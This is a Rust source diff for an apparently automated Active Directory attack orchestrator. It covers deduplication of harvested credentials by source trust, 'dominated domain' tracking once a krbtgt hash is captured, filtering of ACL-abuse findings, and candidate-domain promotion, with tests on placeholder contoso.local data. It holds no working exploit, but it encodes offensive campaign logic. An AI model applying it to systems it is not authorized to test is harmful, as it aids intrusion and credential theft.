-        assert!(s.domains.contains(&"contoso.local".to_string()));
+        assert!(
+            s.domains.is_empty(),
+            "state.domains must remain untouched by credential ingestion, got {:?}",
+            s.domains
+        );
+        assert_eq!(s.credentials.len(), 1);
+    }
+
+    #[tokio::test]
+    async fn publish_credential_rejects_phantom_description_field_dup() {
+        // Forest-wide LDAP/GC searches can return a user from one domain while
+        // the parser's tracked `current_domain` points at another.
When that + // happens, a description_field cred is published under the wrong + // domain — same (user, password) but different domain — and pollutes + // find_trust_credential's cross-forest selection. publish_credential + // must reject the phantom so cross-forest auth picks a real principal. + let state = SharedState::new("op-1".to_string()); + let q = mock_queue(); + + let real = Credential { + id: uuid::Uuid::new_v4().to_string(), + username: "alice".to_string(), + password: "Heartsbane".to_string(), + domain: "child.contoso.local".to_string(), + source: "initial".to_string(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + }; + assert!(state.publish_credential(&q, real).await.unwrap()); + + let phantom = Credential { + id: uuid::Uuid::new_v4().to_string(), + username: "alice".to_string(), + password: "Heartsbane".to_string(), + domain: "contoso.local".to_string(), + source: "description_field".to_string(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + }; + assert!(!state.publish_credential(&q, phantom).await.unwrap()); + + let s = state.inner.read().await; + assert_eq!(s.credentials.len(), 1); + assert_eq!(s.credentials[0].domain, "child.contoso.local"); + } + + #[tokio::test] + async fn publish_credential_rejects_low_trust_after_high_trust_phantom() { + // Generalization of description_field rejection to all low-trust + // sources. autologon_registry pulled a CHILD user but the surrounding + // line gave a parent-realm prefix (`CONTOSO\bob`). + // secretsdump already pinned the user to child.contoso.local; + // the parent-realm copy must be rejected as a phantom. + let state = SharedState::new("op-1".to_string()); + let q = mock_queue(); + + let real = Credential { + id: uuid::Uuid::new_v4().to_string(), + username: "bob".to_string(), + password: "P@ssw0rd!".to_string(), + domain: "child.contoso.local".to_string(), + source: "secretsdump".to_string(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + }; + assert!(state.publish_credential(&q, real).await.unwrap()); + + let phantom = Credential { + id: uuid::Uuid::new_v4().to_string(), + username: "bob".to_string(), + password: "P@ssw0rd!".to_string(), + domain: "contoso.local".to_string(), + source: "autologon_registry".to_string(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + }; + assert!(!state.publish_credential(&q, phantom).await.unwrap()); + + let s = state.inner.read().await; + assert_eq!(s.credentials.len(), 1); + assert_eq!(s.credentials[0].domain, "child.contoso.local"); + } + + #[tokio::test] + async fn publish_credential_high_trust_not_rejected_after_low_trust() { + // Symmetric guard: when the wrong-realm record arrives FIRST from a + // low-trust source, a later HIGH-trust correct-realm record must NOT + // be rejected — the original gate's blanket rejection on any conflict + // was the bug Task #21 was filed against. 
+ let state = SharedState::new("op-1".to_string()); + let q = mock_queue(); + + let phantom = Credential { + id: uuid::Uuid::new_v4().to_string(), + username: "bob".to_string(), + password: "P@ssw0rd!".to_string(), + domain: "contoso.local".to_string(), + source: "autologon_registry".to_string(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + }; + assert!(state.publish_credential(&q, phantom).await.unwrap()); + + let real = Credential { + id: uuid::Uuid::new_v4().to_string(), + username: "bob".to_string(), + password: "P@ssw0rd!".to_string(), + domain: "child.contoso.local".to_string(), + source: "secretsdump".to_string(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + }; + assert!(state.publish_credential(&q, real).await.unwrap()); + + let s = state.inner.read().await; + // Both stored — a stricter eviction policy could remove the phantom, + // but the priority is to ensure the high-trust record lands in state. + assert!( + s.credentials + .iter() + .any(|c| c.domain == "child.contoso.local" && c.source == "secretsdump"), + "high-trust correct-realm credential must be stored" + ); + } + + #[tokio::test] + async fn publish_credential_equal_trust_both_stored() { + // Two same-source records for the same (user, password) with + // different realms: trust ranking can't disambiguate, so we keep + // both and let downstream realm-strict consumers pick the right one. + let state = SharedState::new("op-1".to_string()); + let q = mock_queue(); + + let a = Credential { + id: uuid::Uuid::new_v4().to_string(), + username: "bob".to_string(), + password: "P@ssw0rd!".to_string(), + domain: "child.contoso.local".to_string(), + source: "autologon_registry".to_string(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + }; + let b = Credential { + id: uuid::Uuid::new_v4().to_string(), + username: "bob".to_string(), + password: "P@ssw0rd!".to_string(), + domain: "contoso.local".to_string(), + source: "autologon_registry".to_string(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + }; + assert!(state.publish_credential(&q, a).await.unwrap()); + assert!(state.publish_credential(&q, b).await.unwrap()); + + let s = state.inner.read().await; + assert_eq!(s.credentials.len(), 2); } #[tokio::test] @@ -407,6 +688,23 @@ mod tests { assert!(!state.publish_hash(&q, hash2).await.unwrap()); } + #[tokio::test] + async fn publish_hash_canonicalizes_realm_to_lowercase() { + // Same hash arriving with mixed-case realms (`CONTOSO.LOCAL` from one + // tool, `contoso.local` from another) must not split into two entries. + let state = SharedState::new("op-1".to_string()); + let q = mock_queue(); + + let upper = make_hash("admin", "CONTOSO.LOCAL", "NTLM", "aabbccdd"); + let lower = make_hash("admin", "contoso.local", "NTLM", "aabbccdd"); + assert!(state.publish_hash(&q, upper).await.unwrap()); + assert!(!state.publish_hash(&q, lower).await.unwrap()); + + let s = state.inner.read().await; + assert_eq!(s.hashes.len(), 1); + assert_eq!(s.hashes[0].domain, "contoso.local"); + } + #[tokio::test] async fn publish_krbtgt_hash_sets_domain_admin() { let state = SharedState::new("op-1".to_string()); @@ -426,6 +724,28 @@ mod tests { assert!(s.dominated_domains.contains("contoso.local")); } + #[tokio::test] + async fn publish_krbtgt_hash_mirrors_dominated_to_redis_set() { + // SCARD ares:op::dominated_domains should reflect the in-memory + // set so post-mortem scripts and dashboards see the same view. 
+ let state = SharedState::new("op-mirror".to_string()); + let q = mock_queue(); + { + let mut s = state.inner.write().await; + s.domains.push("contoso.local".to_string()); + } + + let hash = make_hash("krbtgt", "contoso.local", "NTLM", "aabbccdd11223344"); + state.publish_hash(&q, hash).await.unwrap(); + + let mut conn = q.connection(); + let members: std::collections::HashSet = + redis::AsyncCommands::smembers(&mut conn, "ares:op:op-mirror:dominated_domains") + .await + .unwrap(); + assert!(members.contains("contoso.local")); + } + #[tokio::test] async fn update_hash_cracked_password() { let state = SharedState::new("op-1".to_string()); diff --git a/ares-cli/src/orchestrator/state/publishing/domains.rs b/ares-cli/src/orchestrator/state/publishing/domains.rs new file mode 100644 index 00000000..d8396144 --- /dev/null +++ b/ares-cli/src/orchestrator/state/publishing/domains.rs @@ -0,0 +1,451 @@ +//! Domain candidate publishing and promotion. +//! +//! AD discovery tools that we trust (BloodHound, NetExec, runZero) never +//! promote a hostname-derived suffix to an authoritative domain without +//! corroborating evidence. We follow the same rule: hostname-inferred +//! suffixes land in `state.candidate_domains` and only graduate to +//! `state.domains` when they match a stronger source (`TargetConfig`, +//! `DcSelfReport`, `AuthenticatedAd`, `DnsSrv`) or when an external probe +//! confirms them. + +use anyhow::Result; +use chrono::Utc; +use redis::aio::ConnectionLike; +use redis::AsyncCommands; + +use ares_core::models::{CandidateDomain, DomainEvidence}; +use ares_core::state; + +use crate::orchestrator::state::SharedState; +use crate::orchestrator::task_queue::TaskQueueCore; + +use super::looks_like_real_domain; + +/// Retry transient candidate-domain probes on the next worker tick instead of +/// permanently stranding the candidate after one DNS hiccup. +const CANDIDATE_PROBE_RETRY_SECS: i64 = 30; + +/// Result of attempting to publish a discovered domain. +#[derive(Debug, Clone, PartialEq, Eq)] +pub enum DomainPublishOutcome { + /// Domain entered (or was already in) `state.domains`. + Promoted, + /// Recorded as a candidate; awaiting probe or stronger evidence. + Held, + /// Dropped; cannot be a real AD domain. + Rejected(&'static str), +} + +impl SharedState { + /// Publish a discovered domain with provenance. + /// + /// - Drops shapes that are never AD domains (cloud suffixes, default-OS + /// hostnames, bare TLDs, mDNS link-local). + /// - Auto-promotes when `evidence` is authoritative on its own. + /// - For weaker evidence (`HostnameInference`), promotes only if the + /// candidate corroborates an existing strong source — matching the + /// operation's `target.domain` or a domain already in `state.domains`. + /// - Otherwise records the candidate for later confirmation. + pub async fn publish_candidate_domain( + &self, + queue: &TaskQueueCore, + fqdn: impl Into, + evidence: DomainEvidence, + source_host_ip: Option, + ) -> Result { + let fqdn = fqdn.into().trim().trim_end_matches('.').to_lowercase(); + if !looks_like_real_domain(&fqdn) { + tracing::debug!( + fqdn = %fqdn, + ?evidence, + "Rejected candidate domain (cheap pre-filter)" + ); + return Ok(DomainPublishOutcome::Rejected("not a plausible AD domain")); + } + + // Authoritative evidence promotes immediately. 
+        if evidence.is_authoritative() {
+            self.promote_domain(queue, &fqdn).await?;
+            tracing::info!(domain = %fqdn, ?evidence, "Promoted authoritative domain");
+            return Ok(DomainPublishOutcome::Promoted);
+        }
+
+        // Weaker evidence — check for corroboration before promoting.
+        let corroborated = {
+            let state = self.inner.read().await;
+            let already_known = state.domains.iter().any(|d| d.eq_ignore_ascii_case(&fqdn));
+            let matches_target = state
+                .target
+                .as_ref()
+                .map(|t| t.domain.eq_ignore_ascii_case(&fqdn))
+                .unwrap_or(false);
+            already_known || matches_target
+        };
+
+        if corroborated {
+            self.promote_domain(queue, &fqdn).await?;
+            tracing::info!(
+                domain = %fqdn,
+                ?evidence,
+                "Promoted candidate domain (corroborated by target/known domain)"
+            );
+            return Ok(DomainPublishOutcome::Promoted);
+        }
+
+        // Hold as a candidate for the probe worker to evaluate.
+        let mut candidate = CandidateDomain::new(&fqdn, evidence);
+        if let Some(ip) = source_host_ip {
+            candidate = candidate.with_source(ip);
+        }
+        self.record_candidate(queue, candidate).await?;
+        Ok(DomainPublishOutcome::Held)
+    }
+
+    /// Insert the domain into authoritative state. Idempotent.
+    pub(crate) async fn promote_domain(
+        &self,
+        queue: &TaskQueueCore,
+        fqdn: &str,
+    ) -> Result<()> {
+        let fqdn_lower = fqdn.to_lowercase();
+        let op_id = self.inner.read().await.operation_id.clone();
+        let mut state = self.inner.write().await;
+        // Drop any existing candidate row — promotion supersedes it.
+        state.candidate_domains.remove(&fqdn_lower);
+        if state
+            .domains
+            .iter()
+            .any(|d| d.eq_ignore_ascii_case(&fqdn_lower))
+        {
+            return Ok(());
+        }
+        state.domains.push(fqdn_lower.clone());
+        drop(state);
+
+        let domain_key = format!("{}:{}:{}", state::KEY_PREFIX, op_id, state::KEY_DOMAINS);
+        let candidate_key = format!(
+            "{}:{}:{}",
+            state::KEY_PREFIX,
+            op_id,
+            state::KEY_CANDIDATE_DOMAINS
+        );
+        let mut conn = queue.connection();
+        let _: Result<(), _> = conn.sadd(&domain_key, &fqdn_lower).await;
+        let _: Result<(), _> = conn.expire(&domain_key, 86400i64).await;
+        let _: Result<(), _> = conn.hdel(&candidate_key, &fqdn_lower).await;
+        Ok(())
+    }
+
+    /// Snapshot of candidate domains awaiting probe. Returns candidates in
+    /// arbitrary order; callers should not rely on ordering.
+    pub async fn pending_candidate_domains(&self) -> Vec<CandidateDomain> {
+        let now = Utc::now();
+        let state = self.inner.read().await;
+        state
+            .candidate_domains
+            .values()
+            .filter(|c| {
+                if c.confirmed {
+                    return false;
+                }
+                if !c.probed {
+                    return true;
+                }
+                c.last_probed_at
+                    .map(|ts| (now - ts).num_seconds() >= CANDIDATE_PROBE_RETRY_SECS)
+                    .unwrap_or(true)
+            })
+            .cloned()
+            .collect()
+    }
+
+    /// Mark a candidate as probed without promoting it (e.g. probe was
+    /// indeterminate but the worker wants to back off retries). Persists the
+    /// updated row so it survives orchestrator restart.
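+    ///
+    /// Illustrative sequence: after this call the candidate drops out of
+    /// `pending_candidate_domains()` until `CANDIDATE_PROBE_RETRY_SECS`
+    /// elapse, then becomes pending again (see the cooldown test below).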
+ pub async fn mark_candidate_probed( + &self, + queue: &TaskQueueCore, + fqdn: &str, + ) -> Result<()> { + let fqdn_lower = fqdn.to_lowercase(); + let (op_id, candidate_json) = { + let mut state = self.inner.write().await; + let candidate = match state.candidate_domains.get_mut(&fqdn_lower) { + Some(c) => c, + None => return Ok(()), + }; + candidate.probed = true; + candidate.last_probed_at = Some(Utc::now()); + candidate.probe_failures = candidate.probe_failures.saturating_add(1); + let json = serde_json::to_string(candidate).unwrap_or_default(); + (state.operation_id.clone(), json) + }; + let key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + op_id, + state::KEY_CANDIDATE_DOMAINS + ); + let mut conn = queue.connection(); + let _: Result<(), _> = conn.hset(&key, &fqdn_lower, &candidate_json).await; + Ok(()) + } + + /// Drop a rejected candidate from in-memory + Redis. Idempotent. + pub async fn drop_candidate_domain( + &self, + queue: &TaskQueueCore, + fqdn: &str, + ) -> Result<()> { + let fqdn_lower = fqdn.to_lowercase(); + let op_id = { + let mut state = self.inner.write().await; + state.candidate_domains.remove(&fqdn_lower); + state.operation_id.clone() + }; + let key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + op_id, + state::KEY_CANDIDATE_DOMAINS + ); + let mut conn = queue.connection(); + let _: Result<(), _> = conn.hdel(&key, &fqdn_lower).await; + Ok(()) + } + + /// Persist a candidate domain to in-memory + Redis without promoting it. + async fn record_candidate( + &self, + queue: &TaskQueueCore, + candidate: CandidateDomain, + ) -> Result<()> { + let op_id = self.inner.read().await.operation_id.clone(); + let key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + op_id, + state::KEY_CANDIDATE_DOMAINS + ); + let json = serde_json::to_string(&candidate).unwrap_or_default(); + let fqdn = candidate.fqdn.clone(); + + { + let mut state = self.inner.write().await; + // Don't overwrite a previously-probed candidate with a fresh one. 
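+        // Re-recording would reset `probed`, `last_probed_at`, and
+        // `probe_failures`, defeating the retry backoff that
+        // `pending_candidate_domains()` relies on.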
+ if state.candidate_domains.contains_key(&fqdn) { + return Ok(()); + } + state.candidate_domains.insert(fqdn.clone(), candidate); + } + + tracing::debug!(domain = %fqdn, "Recorded candidate domain (awaiting probe)"); + let mut conn = queue.connection(); + let _: Result<(), _> = conn.hset(&key, &fqdn, &json).await; + let _: Result<(), _> = conn.expire(&key, 86400i64).await; + Ok(()) + } +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::state::SharedState; + use crate::orchestrator::task_queue::TaskQueueCore; + use ares_core::models::Target; + use ares_core::state::mock_redis::MockRedisConnection; + use chrono::Duration; + + fn mock_queue() -> TaskQueueCore { + TaskQueueCore::from_connection(MockRedisConnection::new()) + } + + #[tokio::test] + async fn authoritative_evidence_promotes_immediately() { + let state = SharedState::new("op-1".into()); + let q = mock_queue(); + let outcome = state + .publish_candidate_domain(&q, "contoso.local", DomainEvidence::DcSelfReport, None) + .await + .unwrap(); + assert_eq!(outcome, DomainPublishOutcome::Promoted); + let s = state.inner.read().await; + assert!(s.domains.iter().any(|d| d == "contoso.local")); + assert!(s.candidate_domains.is_empty()); + } + + #[tokio::test] + async fn hostname_inference_held_without_corroboration() { + let state = SharedState::new("op-1".into()); + let q = mock_queue(); + let outcome = state + .publish_candidate_domain( + &q, + "unknown.example.com", + DomainEvidence::HostnameInference, + Some("192.168.58.5".into()), + ) + .await + .unwrap(); + assert_eq!(outcome, DomainPublishOutcome::Held); + let s = state.inner.read().await; + assert!(s.domains.is_empty()); + assert!(s.candidate_domains.contains_key("unknown.example.com")); + } + + #[tokio::test] + async fn hostname_inference_promotes_when_matches_target() { + let state = SharedState::new("op-1".into()); + let q = mock_queue(); + { + let mut s = state.inner.write().await; + s.target = Some(Target { + ip: "192.168.58.10".into(), + hostname: String::new(), + domain: "contoso.local".into(), + environment: String::new(), + }); + } + let outcome = state + .publish_candidate_domain(&q, "contoso.local", DomainEvidence::HostnameInference, None) + .await + .unwrap(); + assert_eq!(outcome, DomainPublishOutcome::Promoted); + } + + #[tokio::test] + async fn hostname_inference_promotes_when_already_known() { + let state = SharedState::new("op-1".into()); + let q = mock_queue(); + { + let mut s = state.inner.write().await; + s.domains.push("contoso.local".into()); + } + let outcome = state + .publish_candidate_domain(&q, "contoso.local", DomainEvidence::HostnameInference, None) + .await + .unwrap(); + assert_eq!(outcome, DomainPublishOutcome::Promoted); + } + + #[tokio::test] + async fn rejects_default_windows_oobe_fqdn() { + let state = SharedState::new("op-1".into()); + let q = mock_queue(); + let outcome = state + .publish_candidate_domain( + &q, + "win-hvtt4f8yn5n.ttb0.local", + DomainEvidence::HostnameInference, + None, + ) + .await + .unwrap(); + assert!(matches!(outcome, DomainPublishOutcome::Rejected(_))); + let s = state.inner.read().await; + assert!(s.domains.is_empty()); + assert!(s.candidate_domains.is_empty()); + } + + #[tokio::test] + async fn rejects_aws_internal_suffix() { + let state = SharedState::new("op-1".into()); + let q = mock_queue(); + let outcome = state + .publish_candidate_domain( + &q, + "us-west-2.compute.internal", + DomainEvidence::HostnameInference, + None, + ) + .await + .unwrap(); + assert!(matches!(outcome, 
DomainPublishOutcome::Rejected(_))); + } + + #[tokio::test] + async fn rejects_bare_local_tld() { + let state = SharedState::new("op-1".into()); + let q = mock_queue(); + let outcome = state + .publish_candidate_domain(&q, "local", DomainEvidence::HostnameInference, None) + .await + .unwrap(); + assert!(matches!(outcome, DomainPublishOutcome::Rejected(_))); + } + + #[tokio::test] + async fn rejects_bonjour_localhost_suffix() { + let state = SharedState::new("op-1".into()); + let q = mock_queue(); + let outcome = state + .publish_candidate_domain( + &q, + "bobs-mac.localhost", + DomainEvidence::HostnameInference, + None, + ) + .await + .unwrap(); + assert!(matches!(outcome, DomainPublishOutcome::Rejected(_))); + } + + #[tokio::test] + async fn promote_drops_existing_candidate_row() { + let state = SharedState::new("op-1".into()); + let q = mock_queue(); + // Seed a candidate, then publish authoritatively for the same name. + state + .publish_candidate_domain(&q, "contoso.local", DomainEvidence::HostnameInference, None) + .await + .unwrap(); + // No corroboration yet → held as candidate. + { + let s = state.inner.read().await; + assert!(s.candidate_domains.contains_key("contoso.local")); + } + // Now an authoritative source confirms it. + state + .publish_candidate_domain(&q, "contoso.local", DomainEvidence::DcSelfReport, None) + .await + .unwrap(); + let s = state.inner.read().await; + assert!(s.domains.iter().any(|d| d == "contoso.local")); + assert!(!s.candidate_domains.contains_key("contoso.local")); + } + + #[tokio::test] + async fn transient_probe_candidates_become_pending_again_after_cooldown() { + let state = SharedState::new("op-1".into()); + let q = mock_queue(); + state + .publish_candidate_domain( + &q, + "transient.example.com", + DomainEvidence::HostnameInference, + None, + ) + .await + .unwrap(); + state + .mark_candidate_probed(&q, "transient.example.com") + .await + .unwrap(); + { + let pending = state.pending_candidate_domains().await; + assert!(pending.is_empty()); + } + { + let mut s = state.inner.write().await; + let cand = s + .candidate_domains + .get_mut("transient.example.com") + .unwrap(); + cand.last_probed_at = + Some(Utc::now() - Duration::seconds(CANDIDATE_PROBE_RETRY_SECS + 1)); + } + let pending = state.pending_candidate_domains().await; + assert_eq!(pending.len(), 1); + assert_eq!(pending[0].fqdn, "transient.example.com"); + } +} diff --git a/ares-cli/src/orchestrator/state/publishing/entities.rs b/ares-cli/src/orchestrator/state/publishing/entities.rs index 246468ff..330c6833 100644 --- a/ares-cli/src/orchestrator/state/publishing/entities.rs +++ b/ares-cli/src/orchestrator/state/publishing/entities.rs @@ -8,6 +8,7 @@ use ares_core::state::{self, RedisStateReader}; use redis::aio::ConnectionLike; +use crate::dedup::is_ghost_machine_account; use crate::orchestrator::state::{SharedState, KEY_VULN_QUEUE}; use crate::orchestrator::task_queue::TaskQueueCore; @@ -101,6 +102,16 @@ impl SharedState { mut vuln: VulnerabilityInfo, strategy: Option<&crate::orchestrator::strategy::Strategy>, ) -> Result { + if should_drop_ghost_acl_vulnerability(&vuln) { + tracing::debug!( + vuln_id = %vuln.vuln_id, + vuln_type = %vuln.vuln_type, + target = %vuln.target, + "Dropping ghost-machine ACL vulnerability" + ); + return Ok(false); + } + // Apply strategy weight override if provided if let Some(strategy_cfg) = strategy { let effective = strategy_cfg.effective_priority(&vuln.vuln_type); @@ -335,6 +346,42 @@ fn are_in_same_forest(a: &str, b: &str) -> bool { 
a.ends_with(&format!(".{b}")) || b.ends_with(&format!(".{a}")) } +fn should_drop_ghost_acl_vulnerability(vuln: &VulnerabilityInfo) -> bool { + if !is_acl_style_vulnerability(&vuln.vuln_type) { + return false; + } + + ghost_machine_target(vuln) +} + +fn is_acl_style_vulnerability(vuln_type: &str) -> bool { + let vtype = vuln_type.trim().to_lowercase(); + matches!( + vtype.as_str(), + "genericall" + | "genericwrite" + | "writedacl" + | "writeowner" + | "writeproperty" + | "allextendedrights" + | "self_membership" + | "write_membership" + | "genericall_computer" + | "genericwrite_computer" + ) || vtype.contains("forcechangepassword") +} + +fn ghost_machine_target(vuln: &VulnerabilityInfo) -> bool { + if is_ghost_machine_account(&vuln.target) { + return true; + } + + ["target", "target_computer", "target_account"] + .into_iter() + .filter_map(|key| vuln.details.get(key).and_then(|v| v.as_str())) + .any(is_ghost_machine_account) +} + #[cfg(test)] mod tests { use super::*; @@ -372,6 +419,24 @@ mod tests { } } + fn make_vuln_with_details( + vuln_id: &str, + vuln_type: &str, + target: &str, + details: HashMap, + ) -> VulnerabilityInfo { + VulnerabilityInfo { + vuln_id: vuln_id.to_string(), + vuln_type: vuln_type.to_string(), + target: target.to_string(), + discovered_by: "test".to_string(), + discovered_at: Utc::now(), + details, + recommended_agent: "exploit".to_string(), + priority: 50, + } + } + fn make_share(host: &str, name: &str) -> Share { Share { host: host.to_string(), @@ -504,6 +569,47 @@ mod tests { assert_eq!(s.discovered_vulnerabilities.len(), 1); } + #[tokio::test] + async fn publish_vulnerability_rejects_ghost_acl_target() { + let state = SharedState::new("op-1".to_string()); + let q = mock_queue(); + + let vuln = make_vuln("VULN-ACL-001", "allextendedrights", "WIN-DPPJMLU3XS6$"); + let added = state.publish_vulnerability(&q, vuln).await.unwrap(); + assert!(!added); + + let s = state.inner.read().await; + assert!(s.discovered_vulnerabilities.is_empty()); + } + + #[tokio::test] + async fn publish_vulnerability_rejects_ghost_acl_target_in_details() { + let state = SharedState::new("op-1".to_string()); + let q = mock_queue(); + + let mut details = HashMap::new(); + details.insert("target".to_string(), serde_json::json!("WIN-DPPJMLU3XS6$")); + let vuln = make_vuln_with_details("VULN-ACL-002", "genericall", "placeholder", details); + let added = state.publish_vulnerability(&q, vuln).await.unwrap(); + assert!(!added); + + let s = state.inner.read().await; + assert!(s.discovered_vulnerabilities.is_empty()); + } + + #[tokio::test] + async fn publish_vulnerability_keeps_real_acl_machine_target() { + let state = SharedState::new("op-1".to_string()); + let q = mock_queue(); + + let vuln = make_vuln("VULN-ACL-003", "genericall", "DC01$"); + let added = state.publish_vulnerability(&q, vuln).await.unwrap(); + assert!(added); + + let s = state.inner.read().await; + assert!(s.discovered_vulnerabilities.contains_key("VULN-ACL-003")); + } + #[tokio::test] async fn publish_share_adds_to_state() { let state = SharedState::new("op-1".to_string()); diff --git a/ares-cli/src/orchestrator/state/publishing/hosts.rs b/ares-cli/src/orchestrator/state/publishing/hosts.rs index a3923601..f96c7b85 100644 --- a/ares-cli/src/orchestrator/state/publishing/hosts.rs +++ b/ares-cli/src/orchestrator/state/publishing/hosts.rs @@ -3,7 +3,7 @@ use anyhow::Result; use redis::AsyncCommands; -use ares_core::models::Host; +use ares_core::models::{DomainEvidence, Host}; use ares_core::state::{self, RedisStateReader}; use 
redis::aio::ConnectionLike; @@ -11,15 +11,16 @@ use redis::aio::ConnectionLike; use crate::orchestrator::state::SharedState; use crate::orchestrator::task_queue::TaskQueueCore; -use super::is_aws_hostname; +use super::{looks_like_real_domain, strip_netexec_artifact}; impl SharedState { /// Add a host to state and Redis. /// /// Merges data when a host with the same IP already exists: upgrades DC - /// status, fills in hostname, and keeps the richer service list. - /// AWS internal hostnames (e.g. `ip-10-1-2-150.us-west-2.compute.internal`) - /// are stripped to allow real AD FQDNs to take precedence. + /// status, fills in hostname, and keeps the richer service list. Hostnames + /// that can't be a real AD FQDN — cloud PTRs, default-OS auto-names, + /// mDNS, bare TLDs — are cleared via `looks_like_real_domain` so a real + /// FQDN can take precedence later. /// /// When the hostname is a valid AD FQDN (e.g. `dc01.contoso.local`), the /// domain suffix is automatically extracted and added to `state.domains` @@ -29,43 +30,35 @@ impl SharedState { queue: &TaskQueueCore, host: Host, ) -> Result { - // Normalize hostname: strip trailing dots and AWS internal names + // NetExec sometimes appends "0." to domain names (e.g. + // "dc01.contoso.local0." → "dc01.contoso.local"). Strip that, then + // drop any multi-label hostname that fails the unified shape filter. let mut host = host; - host.hostname = host.hostname.trim_end_matches('.').to_lowercase(); - if is_aws_hostname(&host.hostname) { + host.hostname = strip_netexec_artifact(&host.hostname).to_lowercase(); + if host.hostname.contains('.') && !looks_like_real_domain(&host.hostname) { host.hostname = String::new(); } - // Auto-extract domain from FQDN hostname (matches Python add_host) - // e.g. "dc02.child.contoso.local" → "child.contoso.local" - if !host.hostname.is_empty() - && host.hostname.contains('.') - && !is_aws_hostname(&host.hostname) - { + // Auto-extract domain from FQDN hostname (matches Python add_host). + // e.g. "dc02.child.contoso.local" → "child.contoso.local". Routed + // through the candidate-domain pipeline: a hostname split alone is + // weak evidence and won't reach `state.domains` unless a stronger + // source (target config, DC self-report, probe) confirms it. + if looks_like_real_domain(&host.hostname) { let hostname_clean = host.hostname.trim_end_matches('.'); let parts: Vec<&str> = hostname_clean.split('.').collect(); if parts.len() >= 3 { let domain = parts[1..].join(".").to_lowercase(); - // Reject AWS/cloud domains - if !domain.contains("compute.internal") && !domain.contains("amazonaws.com") { - let op_id = self.inner.read().await.operation_id.clone(); - let mut state = self.inner.write().await; - if !state.domains.contains(&domain) { - state.domains.push(domain.clone()); - let domain_key = - format!("{}:{}:{}", state::KEY_PREFIX, op_id, state::KEY_DOMAINS,); - let mut conn = queue.connection(); - let _: Result<(), _> = - redis::AsyncCommands::sadd(&mut conn, &domain_key, &domain).await; - let _: Result<(), _> = - redis::AsyncCommands::expire(&mut conn, &domain_key, 86400i64).await; - tracing::info!( - hostname = %host.hostname, - domain = %domain, - "Auto-extracted domain from host FQDN" - ); - } - } + // A DC FQDN is the DC self-reporting its own domain — strong + // enough to bypass the candidate hold. 
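The two evidence variants used at these call sites imply a promotion rule roughly like the sketch below. This is an inference from the tests, not the actual implementation: the real `DomainEvidence` lives in `ares_core::models`, the promotion logic in `publishing/domains.rs`, and both may carry more cases (a probe-confirmed variant is hinted at in the surrounding comments).

```rust
// Sketch only. Variant names match the two used at the call sites; semantics
// are read off the tests: a DC self-report promotes immediately, hostname
// inference is held as a candidate unless corroborated by the target config.
enum DomainEvidence {
    HostnameInference, // weak: suffix split from some host's FQDN
    DcSelfReport,      // strong: the DC names its own domain
}

fn promotes_immediately(evidence: &DomainEvidence, matches_target_domain: bool) -> bool {
    match evidence {
        DomainEvidence::DcSelfReport => true,
        DomainEvidence::HostnameInference => matches_target_domain,
    }
}
```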
+ let evidence = if host.is_dc || host.detect_dc() { + DomainEvidence::DcSelfReport + } else { + DomainEvidence::HostnameInference + }; + let _ = self + .publish_candidate_domain(queue, &domain, evidence, Some(host.ip.clone())) + .await; // Auto-populate netbios_to_fqdn map so CLI can resolve short names. // e.g. "dc02.child.contoso.local" → DC02 → dc02.child.contoso.local @@ -102,19 +95,30 @@ impl SharedState { } let new_is_dc = host.is_dc || host.detect_dc(); let was_dc = existing.is_dc; - let had_hostname = !existing.hostname.is_empty(); + let had_fqdn = existing.hostname.contains('.'); let mut changed = false; if new_is_dc && !existing.is_dc { existing.is_dc = true; changed = true; } - // Strip AWS hostname from existing entry too - if is_aws_hostname(&existing.hostname) { + // Drop unusable hostnames on the existing entry too so a + // later real FQDN merge can replace them. + if existing.hostname.contains('.') && !looks_like_real_domain(&existing.hostname) { existing.hostname = String::new(); changed = true; } - if !host.hostname.is_empty() && existing.hostname.is_empty() { + // Upgrade short name to FQDN when a better hostname arrives. + // Without this, the short name (e.g. "dc01") sticks + // and `register_dc` can't derive a domain from it, which + // forces the ambiguous fallback path and mis-maps DCs. + let upgrade_to_fqdn = host.hostname.contains('.') + && !existing.hostname.contains('.') + && host + .hostname + .to_lowercase() + .starts_with(&format!("{}.", existing.hostname.to_lowercase())); + if (!host.hostname.is_empty() && existing.hostname.is_empty()) || upgrade_to_fqdn { existing.hostname = host.hostname.clone(); changed = true; } @@ -138,11 +142,11 @@ impl SharedState { } // Re-register DC if it just became a DC, or if its hostname - // was just filled in (so we can correct the domain mapping). + // was upgraded to (or first set to) an FQDN — that's when we + // can finally derive the correct domain instead of guessing. let is_dc_now = existing.is_dc; - let has_hostname_now = !existing.hostname.is_empty(); - let needs_dc = - (is_dc_now && !was_dc) || (is_dc_now && has_hostname_now && !had_hostname); + let has_fqdn_now = existing.hostname.contains('.'); + let needs_dc = (is_dc_now && !was_dc) || (is_dc_now && has_fqdn_now && !had_fqdn); (needs_dc, true) } else { // No existing host — will be added below @@ -252,12 +256,14 @@ impl SharedState { queue: &TaskQueueCore, host: &Host, ) -> Result<()> { - // Require at least 3 dot-separated parts (e.g. dc03.contoso.local) - // so 2-part hostnames like "HOSTNAME.local" don't yield "local" as the domain. - let raw_domain = if !host.hostname.is_empty() { + // `looks_like_real_domain` enforces the unified hostname-shape rules + // (cloud PTRs, default-OS auto-names, mDNS, bare TLDs). After it + // passes, also require ≥3 dot-separated parts so 2-label names like + // `DC01.local` don't yield `local` as the AD domain. + let derived = if looks_like_real_domain(&host.hostname) { let parts: Vec<&str> = host.hostname.split('.').collect(); if parts.len() >= 3 { - parts[1..].join(".") + parts[1..].join(".").to_lowercase() } else { String::new() } @@ -265,35 +271,54 @@ impl SharedState { String::new() }; - // If we can't derive a domain from the hostname, fall back to the - // target domain already in state. This unblocks automation for DCs - // discovered before their FQDN is resolved. 
